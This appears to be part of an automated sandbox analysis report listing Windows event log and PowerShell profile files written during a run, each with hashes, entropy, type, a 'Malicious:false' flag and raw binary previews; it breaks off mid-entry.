                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1079756391222424
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul0ll/lZ:NllUcl/
                                                                              MD5:C296B0C35354DD06C955237718AAC40C
                                                                              SHA1:DCE0F8D35974AA0AB49353CD949F2DD8F54B25FF
                                                                              SHA-256:A6D63E2AE04A32B3609B7886FBF4D1E0D37B6293C1E8CF6415FED4B76001FC8D
                                                                              SHA-512:1AEB19BF2D0C32B0E7ED32614AB1C0A263629D1D0967EAA4B6BFA6FCD81BCE0D0DCCCD596427880FCBC34D1911835FBD7364AE4002EDDCDA4BF63C66F42B7F75
                                                                              Malicious:false
                                                                              Preview:@...e.................................@..............@..........

                                                                              C:\Windows\System32\winevt\Logs\Application.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                                              Category:dropped
                                                                              Size (bytes):3680
                                                                              Entropy (8bit):3.976453520664781
                                                                              Encrypted:false
                                                                              SSDEEP:48:MLUBrP+yXCrPwfFRVEfWb3/Ooc07YytxsiDC39SqdrSDFDS0UDEOH:JtCrup/vOocaheiDCNjoFsJ
                                                                              MD5:A0CE04676DC4823E9F37FE61DA2A71EE
                                                                              SHA1:40C6D47D3DA6F2575223B094D40085734BA50964
                                                                              SHA-256:38015AC7E35374530D63205D10FB09719D7B1CBDE903005C184F33661B0F082B
                                                                              SHA-512:DC1820E33C3B18D95D1B18330F54B128F148B1DDE857EC42287FCDE2B398004D6219154B9AC24BFBB509D4B81C2C7C696A1F74B50271B7F0204B0B22F53C4698
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................d.......f...........P...`.....\....................................................................../%.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...............................&.......................................................................~...............**..X...d........L...^..........&.........}.]..+..$.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.038021459059496
                                                                              Encrypted:false
                                                                              SSDEEP:768:PVUHiapX7xadptrDT9W84bW664k5Xyvk:OHi6xadptrX9WPbR
                                                                              MD5:56B9A271179BF003083C8002C7F5A875
                                                                              SHA1:69E0E10B48EB41FD650F3C9BAE65D49F27ADB313
                                                                              SHA-256:30512EBF0889D3AC4CE2612E994843DF72F0B48D24561B0E8FDF44ED199A2AF7
                                                                              SHA-512:0F6FDBC34E40413FA31E1CE1FCBE526434236213CEF3D5D5DE3205DD81A405CCD910DEBF533927302A08A17B71E03F0DEA9214F763BDA012C7FA0617BDF0A2AF
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........P...............P...........`.......Cr`w......................................................................0`................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.4013147639327475
                                                                              Encrypted:false
                                                                              SSDEEP:384:FhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZs:FGvsbF1QBjr1xCKuL48fpoQ
                                                                              MD5:D352D15D6A29EC818FCCB7D131D827B4
                                                                              SHA1:E83944244EF8A5B84B6A8DF486A5A5801937ED51
                                                                              SHA-256:B57978A9C8C8B8D8DF2EC5AAE442504C7327951A2602CD8322378EB9E6AC0D57
                                                                              SHA-512:CF9CDEAE9F69A19E36214B4C29D9C319B231675CD5B4B3A7BAC8F1EE23FFDB06E8E4188E0309A2B710EA1AC8948F72ED4EC7CA8209FA7C0255E1C3BA4614E959
                                                                              Malicious:false
                                                                              Preview:ElfChnk............................................lK..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F....................C.......................J...............................................................i...................F......e...........**..............."s...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115472
                                                                              Entropy (8bit):4.291605729126609
                                                                              Encrypted:false
                                                                              SSDEEP:384:VV+VHJVrVaV+VLVZVChsVPVUVvVoVTVXV8VMVxVIVyV5JVYV6VCiVfV5V/VBVAVw:SOI1iRI1iQ
                                                                              MD5:6DCFAC0CF1D2A8EB54C31C981F0AA766
                                                                              SHA1:5FFC0C5E7D30ED1470F2920C7575D497F8D88142
                                                                              SHA-256:FA03CE991B7F9B3CA443672E4C92DAFDCD52522C524AA6203A2EE39A44890EDF
                                                                              SHA-512:BF2B8A97113939233B5BAFF8CE7BC73229BABF04DE50E8FF422EE63DE793914830256F4A7998E8AB40103BE742F0495388382D6CC38E5D7CB4C2336F5A8BD14B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.i...............i...................H.......p.C6....................................................................T1..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................................................3.......................................................8..........................&...Y1......**..............8..r..........F..&...............................................................@.......X...w.!.....E..........@8..r.................................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........d...m.i.c.r.o.s.o.f.t...w.i.n.d.o.w.s.c.o.m.m.u.n.i.c.a.t.i.o.n.s.a.p.p.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....n.d.o....**......

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.423265177202914
                                                                              Encrypted:false
                                                                              SSDEEP:384:67UhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsn:XMrJcWHvqisqnvokZRKeTSPnSKn
                                                                              MD5:34B35A683C68A73A1BF569F68E54DB0D
                                                                              SHA1:FC5C102CFE726B21653E768ADA9A275FADA90550
                                                                              SHA-256:82203A8B2AF5D6CF60E99ADA87DF17CED01A954F995B6649E26E1C08FB97BEC9
                                                                              SHA-512:E547B36385DBFBAF0D825AE5475C3CEF0B1949E632402D94385794F1AA1A8A565738FA29C4F895894DB61B86CE7F29DF2D389CFF63D9D246AE5157BAB20DABB1
                                                                              Malicious:false
                                                                              Preview:ElfChnk..0.......0.......0.......0..........x...X...iS.~........................................................................................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...................................C\..........................................KJ...............H..;d.......X..............#...........%...........**.......0....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                                                              Category:dropped
                                                                              Size (bytes):70680
                                                                              Entropy (8bit):0.7976496829237599
                                                                              Encrypted:false
                                                                              SSDEEP:384:PxhpiMLe8XiCtViyiLhpiMLe8XiCtViyi:ZPpoPp
                                                                              MD5:EE9C64BA3669517760F6702E9F294B91
                                                                              SHA1:5B39471353F5941573B4E135E4CDFA236504B3D6
                                                                              SHA-256:57F292FACF1B6C7548D9350B2C319BE1CC6810BB03290E5FCB1FE662E3EC9830
                                                                              SHA-512:923BF3711E6146B67E56F509BEFB494E90FD5F5C03F929BAE5FEF6E68C5AD624F60737C9E15220BB076ABBC71DB49911BC0D50B25B5F47255D9DA37F5638DD7D
                                                                              Malicious:false
                                                                              Preview:ElfFile.........................................................................................................................ElfChnk.....................................P.......o........................................................................}w.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.416807332891786
                                                                              Encrypted:false
                                                                              SSDEEP:1536:CbBN2A4VD7VAx8whAGU2woJQghgooKChi581UAkM:
                                                                              MD5:8B93FFD74BA69D506BC1A7CA93434764
                                                                              SHA1:8275F283E3EB6143F33D1B97C889D167963A9B41
                                                                              SHA-256:9D1B6EA5CF8330CB2CE526B709669FCF7BD756EE43E30230B98F3FBE6B80D227
                                                                              SHA-512:8EED6493C2C3B9BD2B0DB0ECF80B6FFCC007A1BB618725BC5681469894965CE2606589062BA941C6B29D23F9A5F46EE9613F2FA46AC0B587CB6130EA99E24A15
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........b...............b...............@...........................................................................Z!H.............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.519960906808938
                                                                              Encrypted:false
                                                                              SSDEEP:768:7PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKk:vXY5nVYIyyqED5BVZUeJ+EsiA881rXT
                                                                              MD5:F2DD657C9A1CB9C4DE1DF89C0F45E5F1
                                                                              SHA1:A9B48C4B4F004BE9F9641753D4BAEADD209BC4EF
                                                                              SHA-256:7601EB81F47B9DFC18BAD436F6657EBFD07782F6C8BC681A76DEFC69C6104613
                                                                              SHA-512:C226D4C11D55C8BA887F2A6314B2C797CA60A12B90C066E7929E0CF182440D3E246C9399D4118FD5E781C7998A85E78AEF363D54D68DA86E39BF6D9F07DA6441
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........|...............|...................%DkZ........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y...........>...........**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):99568
                                                                              Entropy (8bit):2.311841400931602
                                                                              Encrypted:false
                                                                              SSDEEP:384:aosKgoxhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForV:RDCpCDCpr2
                                                                              MD5:48487F6F6DCF6ECF60B5EFC6808C64DC
                                                                              SHA1:F4BD3738C39FD821B317D0AF8D9B138D98280A5E
                                                                              SHA-256:E175C5C87262B0B5A74449EFC93597E49E192978FE83869880F08A8BB49A631B
                                                                              SHA-512:6214F9B0BDDE6E52B167A0934E29177698FED25A013AFC6A636BE66F7DCECBBBD1B9D46881FD48CD8704108B3C6149232CE15696539E88CBBE49246BCCCF7DB5
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................+...-..X.......................................................................{.K................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................U)..............................**..............*+..^........F..................................................................>.......V...X.!..e..............*+..^...............................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8512934663046342
                                                                              Encrypted:false
                                                                              SSDEEP:384:vhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xP:v2Nz
                                                                              MD5:B58E72BD85CF367466349FADCF9A5818
                                                                              SHA1:0F561886DC1FC8FBCA5DC8CA10DB1A7C34CEE419
                                                                              SHA-256:D6F533FC5273A6E86F4295EE8935D94CC1A1CCD12A0DCA9C6C9723F852772861
                                                                              SHA-512:32893F184EE6EA667D4FA98625F5B0192256F05E072513D2F68C3078FA2002824DB743BF759C5DEF4EBFD92D4257E5EE06FF584D0F4A79D8A964FA2C65CFCA01
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................%...&.........................................................................p4..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8432260898567245
                                                                              Encrypted:false
                                                                              SSDEEP:384:hhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lD:hWXSYieD+tvgzmMvG5m2a0
                                                                              MD5:9BCAC131A0E1046D07A1126509C0163B
                                                                              SHA1:668C02B1F04155FC7C86DA0FD801AB8512D8E647
                                                                              SHA-256:A069A8295BD4D219C7E117748EC00A8CE85C3AD2F84991B77311E865DA012C90
                                                                              SHA-512:11CECFB1CC6FB52B75BBEADCB99337634B61B1D4B78514905846BC0D6F57704EFDD01E59177C0A843FB8346DF2AEF6FF00315D1597E526F4408368A0834B4E90
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................$...&............................................................................W................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.0648786474735816
                                                                              Encrypted:false
                                                                              SSDEEP:384:uhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28k:ubCyhLfISid
                                                                              MD5:B43482B6E0A6F0C98F6F1FD45D135CCA
                                                                              SHA1:7D866A9F6AA0E8147BCE219760299CFA892CFF66
                                                                              SHA-256:9DABDEE7135BC748B38B7D769B1A33DC06E3A7FB4783E7F2ADC5FB84774C84C3
                                                                              SHA-512:F8F4B12FBE4EB7C49FD16DC53F428CB1B36A4C64C6288254DB1EE2F9D9AD1DA82097F3B8EE335BF812671DA9976718A79025AC5B08A52116BD5FB8046C772C6E
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........J...............J...............`...uk......................................................................k..b................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.2717996314210374
                                                                              Encrypted:false
                                                                              SSDEEP:768:NcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa3:eMhFBuV
                                                                              MD5:C60BBFAFCE737B77BEE93705B85ED648
                                                                              SHA1:10F8D852CE8404B6B6D875C22618BBA690A864C3
                                                                              SHA-256:551A780C4C1734FDBD0FA1A01BBC51193DC1230FE3A4ABDA3E4B75E8CE511DEE
                                                                              SHA-512:AE2F31F30563DC72FC3E8BBBD63301218FC59A50A20856018463AB0584B8921C4836E20578F43724692A1CE74C3369F8B874C3E7D868C12D3C424A0407F24E8A
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........K...............K....................RE....................................................................7f..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.896745651566555
                                                                              Encrypted:false
                                                                              SSDEEP:768:nre2Q+uYvAzBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:WHf
                                                                              MD5:396196233DA144BC9B1AC36AEBA3FA42
                                                                              SHA1:B5800B9F323B93BCBCFA9D2F727A9975CACD6337
                                                                              SHA-256:4A268F50173502D662F85D13944A1249B58912BCD3BC9FA6B419CB1E561D2969
                                                                              SHA-512:A0C83A765A92F558C0BBD72D418D6C8A2AB26F90A71DA6B5342C1AC98E3BB3AC0A57E6DBA86AB7334276A0058863364C36D8205EEBEAF1B29B411860DA528F61
                                                                              Malicious:false
                                                                              Preview:ElfChnk.v.......x.......v.......x...........P...`...d........................................................................X.e........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.924636023538134
                                                                              Encrypted:false
                                                                              SSDEEP:384:wh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDx:wMAP1Qa5AgfQQn
                                                                              MD5:8EC9027553BC6E0AA226CBE3AA9AEC1A
                                                                              SHA1:3E261D8E27902EB9EEF0333F5716E2298FE8FA55
                                                                              SHA-256:A2261A47F8E8D6F1E200968E7080400155424C4DD140F281C48FEACD0017A010
                                                                              SHA-512:859C59B36EFF5DCEBD329ABED2952EE5ECE6B4D5A8918C341878E77ABEC82C6B2CA0F7392E5DF79C30A004ECF82664DBA87381739F55FC7D6547AC84DDA1BA65
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................0_..0b.............................................................................o................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.4435307576303655
                                                                              Encrypted:false
                                                                              SSDEEP:384:3hBE0EGEq0EJE9EdEmE0S4E9/8OaExy4vEeE0TEVzEfEm/8E3VEQEoEwDEfEtEMZ:35SWOQRjEHgl4iYlz
                                                                              MD5:A8DA15633D80829F32A3E0CD50CFD995
                                                                              SHA1:CD4DD833ED62AD6DEE8A4B109A0356075CCDB8EC
                                                                              SHA-256:30BF357C2ADCC24F1A1A48EA85302CB33B8993899685FFFFDC13CD2E4A15C05F
                                                                              SHA-512:C7D808E257302F4D08623CE5C5A8D622CE946ADAA2543EE97A1AD3759CF11F93FAAFC8D786CDD4B32A1CBC1E97D5472A30B2A1EBADD5014F7F11BF2B92F1EA8B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.s...............s...................@.......N...........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F....................@...............>... ..E....................$...........(...&.......".......................F...........D...............Q......**......s....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.3316790418382953
                                                                              Encrypted:false
                                                                              SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl/:a1T4hy3V3
                                                                              MD5:F7D62B056AB8FE4B83092B05915DD92A
                                                                              SHA1:7310B87EC20943EE7854A907C4F807D04D148ABF
                                                                              SHA-256:337F9831E9B639FC1523A9EBBDBA186A13D82AF929262CCA31F9FE0677B18E4A
                                                                              SHA-512:23FA4D0C18EFC32B8D0A7E5472973DFE557BC793E1BA38468CF5760561700FC1F7965B5A231F76D277B49E5B5E381F8773ED88E6B472CFAC78D5332A495F33ED
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........m...............m...........@.......r9{.....................................................................g..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../...........n...........**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                              Download File
